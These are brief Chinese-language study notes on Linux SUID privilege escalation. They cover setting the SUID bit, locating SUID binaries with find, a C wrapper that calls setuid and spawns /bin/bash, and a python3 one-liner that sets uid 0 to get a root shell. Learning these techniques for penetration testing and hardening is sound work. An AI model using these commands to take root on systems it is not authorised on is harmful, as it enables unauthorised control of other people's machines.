SUID
一、权限
二、S权限
chmod 4755 文件名
chmod u+s 文件名 //u代表当前用户
三、查找SUID权限
//find代表查找,/代表根目录,-perm代表权限,-u代表当前用户,s代表s权限,type代表类型,f为二进制文件,2代表错误,/dev/null代表文件
find / -perm -u=s -type f 2>/dev/null
四、python开启http服务
python -m SimpleHTTPServer
五、脚本提权
1、创建一个脚本
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
int main()
{
setuid(geteuid());
system("/bin/bash");
return 0;
}
2、gcc编译然后给他权限
3、切换成普通用户提权
六、python提权
查看python是否是SUID
ls -alh /usr/bin/python3.7
python3 -c "import os;os.setuid(0);os.system('/bin/bash')"
whoami